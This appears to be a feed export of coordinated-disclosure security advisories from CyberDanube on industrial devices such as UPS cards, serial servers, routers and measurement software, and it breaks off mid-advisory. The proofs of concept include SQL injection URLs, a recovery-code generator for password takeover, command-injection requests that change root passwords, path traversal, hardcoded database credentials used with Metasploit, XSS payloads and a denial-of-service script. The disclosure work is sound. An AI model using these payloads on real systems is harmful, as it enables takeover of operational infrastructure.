Advisory – CyberDanube https://cyberdanube.com/en/ Being prepared is the key to success Thu, 19 Sep 2024 14:19:51 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.2 https://cyberdanube.com/wp-content/uploads/2022/02/favicon_32x32.png Advisory – CyberDanube https://cyberdanube.com/en/ 32 32 [EN] Multiple Vulnerabilities in Riello Netman 204 https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/ Thu, 19 Sep 2024 10:47:51 +0000 https://cyberdanube.com/en/?p=4605

Title: Multiple Vulnerabilities
Product: Netman 204
Vulnerable version: 4.05
Fixed version: None
CVE: CVE-2024-8877, CVE-2024-8878
Impact: High
Homepage: https://www.riello-ups.com/
Found: 2024-05-17


The Netman 204 series is prone to unauthenticated SQL injection that allows modification of energy measurement entries. Furthermore, the UPS password reset function can be abused to reset the password without the riello support by calculating the recovery code for resetting the password.

Vendor description

“Riello Elettronica, lead by Cav. Lav. Pierantonio Riello, has a presence today in the Electrical manufacturing industry with two divisions: Energy, Automation and Security. It is a leader in the Uninterruptible Power Supply market with the well-known brand Riello UPS. Energy represents the Group’s core business, in particular with the manufacture of UPS that are firstly able to guarantee the quality of electricity and secondly maintain normal operation and continuity in case of blackouts or anomalies in the energy supply. Riello UPS designs and produces strategical solutions for every kind of requirement and make a bespoke offering according to the clients’ needs: from banks to the hospitals, transport to infrastructures, from domestic use to data centres.”

Source: https://www.riello-ups.com/pages/41-the-riello-elettronica-group

Vulnerable versions

NetMan 204 / 4.05

Vulnerability overview

1) SQL Injection (CVE-2024-8877)
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.

2) Unauthenticated Password Reset (CVE-2024-8878)
By navigating to the endpoint /recoverpassword.html an attacker can gather the netmanid from the UPS. This id can be used to calculate the recovery code for resetting the password. This way enables an attacker to take over control of the UPS and e.g. turn it off.

Proof of Concept

1) SQL Injection (CVE-2024-8877)

The system is subsceptible to SQL injections, which is illustrated by the following payloads:

AND 1=0:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%270

AND 1=1:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271

The first request does not return any data, while the second request returns all entries with a start and end date in the given interval.

2) Unauthenticated Password Reset (CVE-2024-8878)

The following python script can be used to generate the recovery code from the netmanid:

import hashlib
import sys
def calc_code(netman_id):
secret = b”NMP”
netman_id = secret + netman_id[3:]
round1 = hashlib.md5(netman_id).hexdigest().encode(‘utf-8’)
round2 = hashlib.sha1(round1).hexdigest()
code = round2[5:5+7]
return code
if len(sys.argv) < 2:
sys.exit(“usage: {} netman_id”.format(sys.argv[0]))
netman_id = sys.argv[1]
print(calc_code(netman_id.encode(‘utf-8’))

Inputting the recovery code in “/recoverpassword.html” resets the login credentials to admin:admin.

Solution

None.

Workaround

Limit access to the device.

Recommendation

Riello should release a firmware update that fixes the mentioned vulnerabilities.
Customers should not use this device in productive networks.


Contact Timeline

  • 2024-05-21: Contacting Riello UPS Group via riello@riello-ups.com.
  • 2024-06-06: Contacting Riello UPS Group via security-incident@riello-ups.com.
  • 2024-06-10: Received confirmation that the issue is being looked into.
  • 2024-07-22: Asking Riello UPS Group for a status of the update.
  • 2024-07-22: Contact stated that there is no planned date for the update.
  • 2024-08-05: Asking Riello UPS Group for a status of the update and telling them that the advisory will be published on 2024-09-19 after a 90-day period as stated in our Responsible Disclosure Agreement.
  • 2024-08-07: Contact stated that there are no news regarding the update and that it would take longer than 2024-09-19.
  • 2024-08-13: Asking Riello UPS Group about news on the update and a possible release date.
  • 2024-08-26: Contact stated that there are is no information regarding the update.
  • 2024-09-19: Advisory published.

Author

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in research activities within the fields of firmware emulation and firmware analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework.

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

]]>
[EN] Multiple Vulnerabilities in Korenix JetPort https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetport/ Sun, 04 Aug 2024 14:00:09 +0000 https://cyberdanube.com/en/?p=4597

Title: Multiple Vulnerabilities
Product: Korenix JetPort
Vulnerable version: <=1.2
Fixed version: None
CVE: CVE-2024-7395, CVE-2024-7396, CVE-2024-7397
Impact: High
Homepage: https://korenix.com/
Found: 2024-04-01


The JetPort series is prone to unauthenicated command injection, which allows an attacker to fully compromise the device from the network.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

JetPort 5601v3 / v1.2

Vulnerability overview

1) Insufficient Authentication (CVE-2024-7395)
The configuration service on port 600/tcp doesnt require authentication to be used. This allows an attacker to change the password or other critical information.

2) Plaintext Communication (CVE-2024-7396)
The communication of the configuration service is transmitted in plain text. An attacker could use this information to sniff passwords or other critical information.

3) Unauthenticated Command Injection (CVE-2024-7397)
An attacker with network access an can execute arbitrary commands as root user via the management service on port 600/tcp.

Proof of Concept

1) Insufficient Authentication (CVE-2024-7395)

The management software JetPort Commander is used as an frontend for the telnet service on 600/tcp. While it is possible to set a password, the passwords gets sent to the software in cleartext and gets validated on the client software rather than on the device. An attacker can bypass the management software by using telnet to directly connect to the port. This allows him to reconfigure the device including passwords and access controls.

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‘^]’.
-> setpassword poc

target:/$ cat /tmp/com2ip.conf
version:1.2.0
model:JetPort5601v3
name:JetPort5601v3-DEFAULT
serialno:0000000000000000
password:poc
switchmode:redundant
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)

The management service uses telnet as protocol. We used tcpdump to inspect the traffic during a password change. The new password (newpass) is readable during transmission.

# sudo tcpdump -i virbr0 dst port 600 -X
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21
0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@…m…z.
0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL…XR+`…3}
0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v…setpassw
0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)

The management service on port 600/tcp is used to configure JetPort devices over the network. An attacker can inject arbitrary commands in multiple settings options. The binary ser2net receives the data via the telnet protocol and translates it to arguments for system() calls. For our PoC we used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‘^]’.
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1
OK
->

target:/$ ls -rtlha /tmp/
drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..
-rw-r–r– 1 root 0 4 Apr 4 12:28 thttpd.pid
-rw-r–r– 1 root 0 712 Apr 4 12:29 com2ip.conf
-rw-r–r– 1 root 0 0 Apr 4 12:33 pwned

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None. Device is End-of-Life.

Workaround

Limit the access to the device and place it within a segmented network.

Recommendation

CyberDanube recommends customers from Korenix to remove the device from their network topology.


Contact Timeline

  • 2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 2024-05-07: Received confirmation that the issue is beeing looked into.
  • 2024-06-10: Contact stated that the product is considered EoL and will no longer receive security updates.
  • 2024-06-10: Confirm receipt and telling them that we will publish the advisory after our 90-days deadline.
  • 2024-08-05: Publication of the Advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

]]>
[EN] Multiple Vulnerabilities in Perten ProcessPlus https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/ Sun, 21 Jul 2024 12:08:32 +0000 https://cyberdanube.com/en/?p=4587

Title: Multiple Vulnerabilities
Product: Perten ProcessPlus
Vulnerable version: <=1.11.6507.0
Fixed version: 2.0.0
CVE: CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
Impact: High
Homepage: https://perkinelmer.com/
Found: 2024-04-24


The ProcessPlus measurement software is prone to local file inclusion, uses default MSSQL credentials, and is executed with unnecessarily high privileges.

Vendor description

“For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. We’ve always pursued science with a clear purpose – to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers’ desire to work better, innovate better, and create better.

PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products.”

Source: https://www.perkinelmer.com/

Vulnerable versions

ProcessPlus Software / <=1.11.6507.0

Vulnerability overview

1) Unauthenticated Local File Inclusion (CVE-2024-6911)
A LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host.

3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user “sa” to connect to the database. Access to this account allows an attacker to execute commands via the “xp_cmdshell” procedure.

Proof of Concept

1) Unauthenticated Local File Inclusion (CVE-2024-6911)

The LFI can be triggered by using the following GET Request:

GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1
Host: 192.168.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

This example returns the content from “C:\Windows\System32\drivers\etc\hosts” of an affected installation.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)

Analysis across multiple installations show that the configuration file “\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml” contains credentials:

[…]
<OPCDA_Server dbconnectstring=”Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno” application_id=”1″
appid=”Perten.OPCDA.Server” loglevel=”info”
logfile=”C:\Perten\ProcessPlus\Log\opcserver.log”>
[…]

These credentials “sa:enilno” were re-used in all reviewed installations.

3) Execution with Unnecessary Privileges (CVE-2024-6913)

The application uses the “sa” user to authenticate with the database. By using Metasploit an attacker can execute arbitrary commands:

msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

Name Current Setting
—- —————
CMD dir
PASSWORD enilno
RHOSTS 192.168.0.1
RPORT 1433
TDSENCRYPTION false
TECHNIQUE xp_cmdshell
USERNAME sa
USE_WINDOWS_AUTHENT false

msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.0.1

[*] 192.168.0.1:1433 – SQL Query: EXEC master..xp_cmdshell ‘dir’

[…]
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
[…]

Solution

Update to version 2.0.0.

Workaround

Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself.

Recommendation

CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface.


Contact Timeline

  • 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.
  • 2024-05-13: Vendor asked for unencrypted advisory.
  • 2024-05-16: Sent advisory to vendor.
  • 2024-05-22: Asked for status update. No answer.
  • 2024-05-28: Asked for status update. Contact stated that they are working on a fix.
  • 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer.
  • 2024-07-13: Asked for status update.
  • 2024-07-15: Contact stated, that all three issues have been fixed in version 2.0.0 which have been released on 2024-07-11.
  • 2024-07-16: Asked for a link to the firmware update release.
  • 2024-07-17: Set release date to 2024-07-22.
  • 2024-07-22: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

]]>
Authenticated Command Injection in Helmholz REX100 Router https://cyberdanube.com/en/authenticated-command-injection-in-helmholz-rex100-router/ Wed, 03 Jul 2024 07:38:24 +0000 https://cyberdanube.com/en/?p=4579

Title: Authenticated Command Injection
Product: Helmholz Industrial Router REX100, MBConnectline mbNET.mini
Vulnerable version: <= 2.2.11
Fixed version: 2.2.13
CVE: CVE-2024-5672
Impact: High
Homepage: https://www.helmholz.de/, https://mbconnectline.com/
Found: 2024-05-08


The Helmholz REX100 Router ist prone to an authenticated command injection attack. This allows an attacker to gain root access on the router, which usually acts as key infrastructure device in OT.

Vendor description

Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-5672)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-5672)

The following GET request changes the password for the root user and returns the process list of the device.

GET /cgi-bin/ping;echo$IFS’root:password’|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for ‘root’ changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[…]

Solution

Update to latest version: 2.2.13

Workaround

None

Recommendation

CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.


Contact Timeline

  • 2024-05-15: Contacting Helmholz via psirt@helmholz.de.
  • 2024-05-15: Receiving security contact for MBConnectline.
  • 2024-05-21: Contact stated they are working on a fix.
  • 2024-06-13: Received advisory from contact and assigned CVE number.
  • 2024-07-01: Contact sends out final release date.
  • 2024-07-03: Coordinated release of advisory with CERT@VDE.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems,  firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

]]>
[EN] Multiple Vulnerabilities in SEH untserver Pro https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/ Mon, 03 Jun 2024 08:21:43 +0000 https://cyberdanube.com/en/?p=4568

Title: Multiple Vulnerabilities
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: 20.1.28
CVE: CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
Impact: High
Homepage: https://www.seh-technology.com/
Found: 2024-03-04


The untserver Pro ist prone to stored cross-site scripting, file disclosure and denial of service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the untserver.

Vendor description

We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.

Source: https://www.seh-technology.com/us/company/about-us.html

Vulnerable versions

utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5420)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. This can be triggered by sending a lot of requests that trigger serial interface access on the device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5420)

By accessing to the following URL, an attacker can modify the device description:
http://$IP/device/description_en.html

By using malicious JavaScript payload, it is possible to execute arbitrary code. This snippet demonstrates such a payload:

“><script>alert(document.location)</script>

Saving this text to the device description leads to a persistent cross-site scripting. Therefore, everyone who openes the device description executes the injected code in the context of the own browser.

2) Authenticated File Disclosure (CVE-2024-5421)

A hidden function in the web-interface of the device can be used to disclose directories and files on operating system level. The function can be accessed directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)

For triggering a denial of service on the device, multiple file descriptors are opened by using the following script:

#!/bin/bash
echo “Parameters: $1 $2”
last_iter=$(($2 – 1))
for ((i=1; i<=$2; i++))
do
echo “[$i] Downloading application binary”
if [[ “$i” == “$last_iter” ]];then
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null &
fi
done

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround

None

Recommendation

CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
  • 2024-03-20: Asked for an update. Contact stated, that an internal timeline will be defined.
  • 2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will be patched soon.
  • 2024-04-16: Contact sent link to patched firmware release candidate.
  • 2024-05-31: Notified SEH Computertechnik that advisory will be released first week of June. Received confirmation from SEH Computertechnik.
  • 2024-06-04: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

]]>
[EN] Multiple Vulnerabilities in ORing IAP420 https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/ Mon, 27 May 2024 11:41:51 +0000 https://cyberdanube.com/en/?p=4560

Title: Multiple Vulnerabilities
Product: ORing IAP-420
Vulnerable version: 2.01e
Fixed version: –
CVE: CVE-2024-5410, CVE-2024-5411
Impact: High
Homepage: https://oringnet.com/
Found: 2024-01-19


The ORing IAP420 is prone to authenticated command injection and stored cross-site scripting. Therefore, an attacker can fully compromize the device via the management interface.

Vendor description

Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.

Source: https://oringnet.com/en/about-us/company-profile

Vulnerable versions

Tested on ORing IAP420 / 2.01e

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5410)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. The SSID of the WiFi can be configured to contain arbitrary JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated Command Injection (CVE-2024-5411)
The filename parameter of the config file upload is prone to a Command Injection vulnerability. This vulnerability can only be exploited if a user is authenticated to the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5410)

Stored Cross-Site Scripting can be triggered by placing JavaScript code into the SSID input field of the web interface as authenticated user. A single request for injecting the script is shown below:

POST /cgi-bin/wl_set.cgi HTTP/1.1
Host: 192.168.0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 659
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&
sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&
sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&
rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&
tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&
tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&
lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&
wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&
wep_key_index=0&ret_msg=

2) Authenticated Command Injection (CVE-2024-5411)

A command can be injected in the filename of the uploaded config. By sending a request as shown below, the content of the current directory can be shown:

POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=—————————347087158737672164432057801583
Content-Length: 563
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=”upfile”; filename=”test.bin;ls${IFS}-la;”

—————————–347087158737672164432057801583
Content-Disposition: form-data; name=”bt_upconf”

Upload
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=”lang”

en
—————————–347087158737672164432057801583
Content-Disposition: form-data; name=”ret_msg_upconf”

—————————–347087158737672164432057801583–

This request is equal to executing “ls -la” on the console of the device.

HTTP/1.0 200 OK
tar: can’t open ‘/tmp/test.bin’: No such file or directory
drwxr-xr-x 4 root root 1024 Mar 7 14:36 .
drwxr-xr-x 8 root root 1024 Jan 30 2024 ..
-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi
-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi
-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi
-rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi
-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi
-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi
-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi
-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi
-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi
[…]

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

None

Workaround

None

Recommendation

CyberDanube recommends Oring customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.


Contact Timeline

  • 2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.
  • 2024-02-19: Asking for an update. No reply.
  • 2024-02-28: Asking for an update. No reply.
  • 2024-03-11: Searched for “cyber security manager” on LinkedIn. Contacted him and got the answer, that the content should be sent to “support@oringnet.com”. Sent the advisory to this address directly.
  • 2024-03-20: Asking for an update. No reply.
  • 2024-04-10: Asking for an update. No reply.
  • 2024-04-30: Including support_us@oringnet.com. Asking for an update. No reply.
  • 2024-05-02: Including support_eu@oringnet.com. Asking for an update. No reply.
  • 2024-05-27: Sent information that the advisory will be published on 2024-05-28.
  • 2024-05-28: Public release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

]]>
[EN] Multiple Vulnerabilities in Korenix JetNet Series https://cyberdanube.com/en/en-multiple-vulnerabilities-in-korenix-jetnet-series/ Tue, 09 Jan 2024 09:57:47 +0000 https://cyberdanube.com/en/?p=4505

Title: Multiple Vulnerabilities
Product: Korenix JetNet Series
Vulnerable version: See “Vulnerable versions”
Fixed version: –
CVE: CVE-2023-5376, CVE-2023-5347
Impact: High
Homepage: https://www.korenix.com/
Found: 2023-08-31


Korenix JetNet series is prone to a unauthenticated firmware upgrade, which leads to remote code execution.

Vendor description

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

Vulnerability overview

1) TFTP Without Authentication (CVE-2023-5376)
